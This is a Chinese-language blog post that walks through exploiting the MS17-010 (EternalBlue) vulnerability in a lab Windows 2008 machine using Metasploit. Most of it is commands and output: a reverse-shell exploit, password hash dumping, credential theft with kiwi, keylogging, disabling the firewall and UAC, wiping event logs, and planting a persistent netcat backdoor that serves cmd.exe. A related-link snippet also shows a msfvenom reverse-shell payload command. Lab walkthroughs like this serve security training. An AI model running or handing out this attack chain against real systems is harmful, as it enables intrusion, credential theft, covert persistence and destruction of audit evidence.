永恒之蓝(MS17-010)漏洞利用

最新推荐文章于 2024-07-24 08:30:35 发布
最新推荐文章于 2024-07-24 08:30:35 发布
阅读量426 收藏
点赞数
分类专栏: Window DC的小样夺旗 网络安全 文章标签: 网络 安全 windows 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51079220/article/details/131716198
版权

永恒之蓝(eternalblue)

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。

SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

1、漏洞利用

第一步:在kali中使用nmap 扫描win-2K8 靶机

1)通过nmap 扫描,我们发现: 目标主机开放了445端口

2)445是共享端口—windows SMB 共享服务使用的端口

3)而且我们还清楚,永恒之蓝这个漏洞,针对的就是windows  SMB 服务,针对的就是445 端口

4)所以,既然目标服务器开放445端口,我们就可以尝试利用永恒之蓝这个漏洞对目标服务器进行扫描和探测

5)当然,我们还可以进一步去做漏洞扫描,用nessus 工具对目标服务器进行漏扫

6)通过nessus  我们也发现目标服务器上存在永恒之蓝这个漏洞

在这里插入图片描述
7)所以我们就可以去msf 这个工具中,查找和永恒之蓝这个漏洞相关的攻击或者辅助的脚本

  • 第二步: 脚本查找
    msf6 > search ms17-010

    1  auxiliary/scanner/smb/smb_ms17_010                      //辅助扫描脚本(smb)      

    2  exploit/windows/smb/ms17_010_eternalblue            //攻击脚本(永恒之蓝)
  • 第三步:漏洞扫描
    msf6 > use 1 

    msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.10.145

    msf6 auxiliary(scanner/smb/smb_ms17_010) > run


	msf6 auxiliary(scanner/smb/smb_ms17_010) > run

	[+] 192.168.10.145:445    - Host is likely VULNERABLE to MS17-010! 
                           //容易遭受ms17-010的攻击
  • 第四步: 漏洞利用,创建反弹连接
msf6 auxiliary(scanner/smb/smb_ms17_010) > back

msf6 > use 2

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp



msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.10.145

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

meterpreter >
  • 第五步:meterpreter环境中,操作远程资源
meterpreter > pwd         //查看远程目录位置

meterpreter > cd   c:/users         //切换到c盘下的users

meterpreter > ls         //列出当前远程目录下的文档资源

meterpreter > dir      //列出当前远程目录下的文档资源(和ls 命令作用相同)

meterpreter > edit  a.txt      //创建并编辑文件a.txt

meterpreter >  cat    a.txt    //查看a.txt 文件内容

meterpreter >  del   a.txt     //删除a.txt文件

meterpreter > mkdir   ntd2111  //创建新目录

meterpreter > rmdir  ntd2111    //删除目录

meterpreter >  lpwd   //查看在kali本机的目录

meterpreter >  lcd     /root/桌面     

//在本地主机kali中,将当前目录切换到 /root/桌面

meterpreter > mkdir    gaga

//在靶机win2008的当前目录users下创建目录abc

meterpreter > upload    /etc/passwd       c:/users/gaga

//将kali 中的文件/etc/passwd 上传到靶机win2008的指定的gaga目录

meterpreter > ls   abc

备注:可以回到windows-2008 c:/users/ 下手动创建jmwj.txt

meterpreter > download   jmwj.txt    

//从靶机win2008中下载文件jmwj.txt 到kali 主机的当前目录

meterpreter > download   jmwj.txt    /opt/

//从靶机win2008中下载文件jmwj.txt  到kali 主机的指定目录/opt
  • 第六步:获取密码
meterpreter > hashdump    

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b

复制第四部分到网站查询 [https://cmd5.com/](https://cmd5.com/)
  • 第七步:获取用户信息
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
  • 第八步:通过 kiwi 模块获取用户口令
meterpreter > load kiwi      //加载kiwi

meterpreter > help kiwi      //kiwi使用帮助

meterpreter > creds_all      //检测所有凭证,该命令可以列举系统中的明文密码

kiwi模块,后渗透阶段的一款利器,内网渗透的一块利器,
windows 密码抓取神器、拥有提权、抓取凭证密码、很多功能,我们今天主要使用进程迁移和密码抓取
  • 第九步:屏幕共享和屏幕截图
meterpreter > screenshot    //屏幕截图

meterpreter > screenshare    //屏幕共享,按快捷键Ctrl + C停止

  • 第十步:键盘记录

    1) 查看我们当前的用户识别码、进程识别码、查看当前用户权限

      meterpreter >  getuid       //查看用户识别码

      meterpreter >  getpid      //查看进程识别码

      meterpreter > getprivs     //查看当前用户权限

      meterpreter > ps            //查看进程列表
		

meterpreter > ps 
============
进程号    应用程序的名字       用户                          
 PID     Name               User                          
 ---     ----               ----                                                                                                            
 1048   spoolsv.exe         NT AUTHORITY\**SYSTEM**           
 1504   taskhost.exe       VAGRANT-2008R2\Administrator

  • 第十一步:进程迁移

    将 SYSTEM 权限 迁移为 Administrator

    meterpreter > ps     //查看进程

    meterpreter > migrate  1504     //进程迁移

    meterpreter > getuid    //确认迁移后的用户识别码

    备注:进程迁移,只能同级别迁移或者高权限用户往低权限迁移,低权限无法往高权限迁移

  • 第十二步:执行键盘操作记录,

    备注:键盘记录需要拥有administrator 权限后才可以成功

    备注:getuid 检测

    方法1:开启键盘记录

    第一:先查看进程

        meterpreter >ps

  第二:做进程迁移,迁移到administrator 用户权限

        meterpreter >migrate  1504(实验过程中,已实际进程号为准)

  第三:确认用户权限

        meterpreter > getuid 

  第四:开启键盘记录

        meterpreter > keyscan_start     //开启键盘记录

第五:在win-2008中拼命疯狂的敲键盘

第六:回到kali 验证:

        meterpreter > keyscan_dump   //导出键盘记录
方法2:利用后渗透脚本开启键盘记录

第一:先查看进程

    meterpreter >ps

第二:做进程迁移,迁移到administrator 用户权限

    meterpreter >migrate  1504(实验过程中,已实际进程号为准)

第三:确认用户权限

    meterpreter > getuid

第四:开启键盘记录后渗透脚本

    meterpreter > run post/windows/capture/keylog_recorder

第五:在 win2k8 打开记事本,输入任意内容

第六:在 kali 检查是否成功记录

      打开新的终端,执行命令检查文件

      [root]# cat   /root/.msf4/loot/20211226174349_default_192.168.10.145···········
  • 第十三步: 防火墙配置
    meterpreter > shell

    C:\Windows\system32> chcp  65001   //解决中文乱码,切换为英文格式

备注windows新版本命令:

1)查看防火墙当前状态

    C:\Windows\system32> netsh    advfirewall      show     currentprofile       state

2)关闭防火墙

    C:\Windows\system32> netsh  advfirewall  set       allprofiles      state    off

3) 开启防火墙

    C:\Windows\system32> netsh advfirewall set allprofiles state on

4)添加防火墙入站规则,放行3333端口

C:\Windows\system32> netsh  advfirewall  firewall   add     rule   name=test   dir=in   action=allow   protocol=tcp localport=3333
                            高级防火墙      防火墙     添加     规则   名字          入站     动作    允许     协议         本地端口
//添加入站规则,规则名称:test   , 协议:tcp    端口:3333

备注:1024之前的端口号,不要用,为什么,因为那些端口号,都已经有主了
  • 第十四步: 关闭UAC
    UAC:User Account Control

  • 用户帐户控制-是windows操作系统中一种安全控制机制

  • 使用UAC,可以防止未经授权应用程序的自动安装,阻止恶意程序,防止系统损坏
    win2k8 检查 UAC 状态

    运行中输入 msconfig,

    默认用户账户是关闭的,我们可以先打开

ADD 添加一个注册表项 -v 创建键值 -t 键值类型 -d 键值的值 1开/0关

-f 不用提示就强行覆盖现有注册表项

在 meterpreter >进入shell 运行命令, 使win2008添加注册表项,关闭用户账户

      c:\windows\system> reg ADD  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System     /v   EnableLUA    /t     REG_DWORD   /d    0    /f
  • 第十五步:在meterpreter 下清除日志
    meterpreter > clearev     //擦除windows 事件查看器
[*] Wiping 1146 records from Application...         //擦除1146应用日志
[*] Wiping 3288 records from System...              //擦除3288系统日志
[*] Wiping 2669 records from Security...           //擦除2669 安全日志

备注:虽然清除 很多日志,但是你擦除日志的这条日志被保留了

2、持久性后门-nc 瑞士军刀 著名后门程序
  • 第一步:上传后面程序nc.exe 到win-2008
    meterpreter > upload /usr/share/windows-binaries/nc.exe   c:/windows/system32

1)查看上传结果及权限

      meterpreter > cd   c:/windows/system32

      meterpreter > ls nc.exe

  • 第二步:在 meterpreter > 执行命令,远程配置win-2008注册表,实现nc.exe 能够开机自启

    第一:添加键值nc

    meterpreter > **reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run   -v   nc   -d "C:\windows\system32\nc.exe     -Ldp   444     -e   cmd.exe"

备注:用注册表告诉win-2008这个系统,让nc.exe程序开机自启动

  • 第二:查询有没有nc这个键值,确认是否添加成功
       meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

      Values (3):

       VMware VM3DService Process

       VMware User Process

       nc     //新增的注册表
  • 第三:查询 NC键值的详细数值内容
      meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc

      Key: HKLM\software\microsoft\windows\currentversion\Run

      Name: nc

      Data: C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe

备注:在win-2008验证:有键值,有键值内容

    ![](https://secure2.wostatic.cn/static/9x17M9vUpdEinV6sP5ophK/1640543114(1).png)

  • 第三步:重启win-2008

    备注:重启win-2008 验证,是否能开机自动启动

    验证:验证靶机上的444端口是否开启

    meterpreter >shell

    C:\Windows\system32> netstat -an

    C:\Windows\system32> netstat -an | findstr "444"

备注:验证2008系统中的444端口是否开启,如果开启证明,nc这个程序以及开机自动运行了,如果没有444这个端口,就代表能nc程序没能成功运行

  • 第四步:可以检查防火墙,防火墙要在入站规则中放行444端口,或者关闭防火墙
    meterpreter > shell

    C:\Windows\system32>  netsh advfirewall firewall add rule name=tedu dir=in action=allow protocol=tcp localport=444

  • 第五步:后门接入

    在 kali 连接 win2k8

    在kali 中打开一个新的终端

     [root] nc 192.168.10.145 444

    C:\Windows\system32>

  • 第六步:清楚痕迹

    验证:在事件查看器里面看到的是administrator 的登录信息,可以清空日志

    
C:\Windows\system32>  wevtutil el    //列出日志名称

C:\Windows\system32>  wevtutil  cl application   //清除应用程序日志

C:\Windows\system32>  wevtutil  cl security     //清除安全日志

C:\Windows\system32>  wevtutil  cl  system    //清除系统日志

  • 常见错误排错:

    如果无法连接到后门程序

    第一步:可以在kali 中检查端口状态

      meterpreter >shell

      C:\Windows\system32> netstat -an

      C:\Windows\system32> netstat -an | findstr ":444"

    ```

    第二步:可以检查防火墙,防火墙要在入站规则中放行444端口,或者关闭防火墙

  meterpreter > shell

  C:\Windows\system32>  netsh advfirewall firewall add rule name=tedu dir=in action=allow protocol=tcp localport=444
不懂说安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
永恒之蓝检测工具MS17-010漏洞扫描工具
06-28
"永恒之蓝"是2017年引起全球关注的安全事件,主要由名为"MS17-010"的Windows系统漏洞引发。这个漏洞利用了微软Windows操作系统中的SMB(Server Message Block)服务,允许攻击者远程执行代码,从而控制受影响的系统...
ms17-010永恒之蓝漏洞复现与处理
热门推荐
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝
Bulldozer_GD的博客
05-03 2851
利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝) 1.实验环境 虚拟机里面配置 kali 和 win7 在同一网段下,这里我设置的10.10.10.0/24: Kali linux 2019(10.10.10.131) Windows 7 X64 (10.10.10.130) 环境链接:[密码 :b79j](https...
实战ms17_010_psexec远程控制漏洞入侵Windows server 2003
hih30250的博客
11-06 931
本篇文章记录使用metasploit利用Windows的远程控制漏洞攻击获取shell权限的过程。
MS17-010 漏洞利用+修复方法
qq_44484541的博客
04-07 2837
使用时一般配合查看远程用户的空闲时长,空闲时间再进行远程登陆,减小被发现的风险。可以发现,靶机上扫到4个漏洞,其中包括了ms17-010。开始攻击,出现meterpreter >表示运行成功。rhosts显示远程主机未配置,配置目标主机ip。开始扫描漏洞,确认靶机存在ms17-010漏洞。使用扫描模块确认是否存在ms17-010漏洞。6.启用远程桌面,配合上一步获取到的密码登陆。使用ms17-010攻击模块并设置攻击载荷。利用nmap漏洞脚本进行扫描。搜索ms17-010相关模块。nmap端口快速扫描。
勒索病毒“WannaCry”之复现过程(永恒之蓝
weixin_40950781的博客
08-09 6771
勒索病毒“WannaCry”复现(永恒之蓝)1.漏洞简述2.漏洞复现2.1复现环境2.3复现过程2.3.3 开始攻击3.结语4.防范 1.漏洞简述 “永恒之蓝”利用Windows系统的SMB漏洞获取系统的最高权限,该工具通过恶意代码扫描开放445端口的Windows系统;被扫描到的Windows系统,只要开机上线,不要要用户进行任何操作,即可通过共享漏洞上传wannacry勒索病毒,远程控制木马等...
永恒之蓝MS17-010漏洞利用
qq_1873822的博客
08-20 3010
前言 永恒之蓝(Eternal Blue) 爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 SMB(全称是Server Message Block) 是一个协议服务器信息块,它是一种客户机/服
永恒之蓝ms17-010的利用
黑战士的博客
04-25 1280
实验环境:Kali虚拟机:攻击机Win7虚拟机:目标机主要工具:metasploit##获取meterpreter17-010可以看到"Host is likely VULNERABLE to MS17-010!…",说明漏洞存在。利用漏洞反弹shell,获取meterpreter,目标机器不能装360或需关闭360。##确认用户权限可以看到是system权限。也可以直接在meterpreter中运行getuid##提权看到"got system via technique…"字样,提权成功。
永恒之蓝 MS17-010漏洞复现
春日野穹
12-21 1651
目录导航 一. 复现环境 二. 漏洞原理 1.漏洞简介 2.漏洞原理代码详解 三. 漏洞复现 1.信息收集 2.漏洞探测 3.漏洞利用 一. 复现环境 工具:msf 攻击机:Kali linux 虚拟机一台 ip: 169.254.93.24 测试机:Windows 2008 r2 虚拟机一台 ip: 169.254.93.243 网络环境:手机WiFi网络USB共享,同一局域网,桥接网络模...
永恒之蓝 ms17-010
来日可期的博客
10-24 1129
永恒之蓝ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
永恒之蓝ms17-010漏洞利用复现
qq_45884775的博客
04-15 3567
一、永恒之蓝简述: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 二、SMB服务简述: SMB(全称是Server Message Block)是一个协议名
永恒之蓝(ms017-010漏洞利用 - 菜鸟-传奇.mhtml
06-13
永恒之蓝(ms017-010漏洞利用 - 菜鸟-传奇.mhtml
MS1710永恒之蓝漏洞利用
07-07
MS1710永恒之蓝漏洞利用
网络安全-实验三ms17-010漏洞利用.docx
11-10
MS17-010漏洞,也称为“永恒之蓝”(EternalBlue),是针对Microsoft Windows操作系统的一个严重漏洞,主要影响Windows XP、Windows 7以及Server 2003和2008等未打补丁的系统。该漏洞利用的是SMB(Server Message ...
MarkTool之TCP服务端
最新发布
Qt学视觉
07-24 209
MarkTool之TCP服务端
【ROS2】演示:为有损网络使用服务质量设置
cxyhjl的博客
07-22 790
目录背景先决条件运行演示命令行选项添加网络流量背景请阅读有关 QoS 设置的文档页面,以获取有关 ROS 2 中可用支持的背景信息。在这个演示中,我们将生成一个发布相机图像的节点和另一个订阅图像并在屏幕上显示图像的节点。然后,我们将模拟它们之间的丢包网络连接,并展示不同的服务质量设置如何处理不良链接。先决条件本教程假设您已安装并运行 ROS 2 和 OpenCV。有关安装说明,请...
网络编程套接字socket
安权_code的博客
07-23 899
网络编程中的套接字(socket)是实现网络通信的关键,换句话来说,套接字像两个端点,而发送方与接收方就是通过这两个端点进行通信的,socket的意思是插座,表示插头和插座连接上后,即发送方和接收方连接上了,然后把电流通过插座流向插头对标发送方与接收方建立了链接。
DNS域名管理系统、搭建DNS服务
十四的博客
07-23 883
DNS概述。
永恒之蓝ms17-010数据包分析
05-13
永恒之蓝是一种利用MS17-010漏洞进行攻击的恶意软件,该漏洞存在于Windows操作系统中的SMBv1协议中。攻击者可以通过发送特定的SMBv1数据包来利用该漏洞,从而获得系统管理员权限并远程控制受感染的计算机。 下面是对MS17-010漏洞利用过程中的数据包分析: 1.攻击者向目标计算机发送一个SMBv1请求。 2.目标计算机返回一个SMBv1响应,其中包含了协议版本、服务器名称、共享资源等信息。 3.攻击者向目标计算机发送一个恶意的SMBv1数据包,该数据包包含了一个特定的Payload,用于利用MS17-010漏洞。该Payload会触发目标计算机的漏洞处理代码,从而导致系统崩溃或者被攻击者接管。 4.目标计算机收到恶意Payload后,会执行其中的代码并将控制权交给攻击者。 5.攻击者利用控制权,可以执行任意命令或者下载其他恶意软件进行进一步攻击。 为了防止MS17-010漏洞的利用,Windows系统开发商发布了相应的补丁程序,用户可以通过更新系统来保护自己的计算机。此外,关闭SMBv1协议也可以有效地防止该漏洞的利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不懂说安全

创作不易您打赏是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值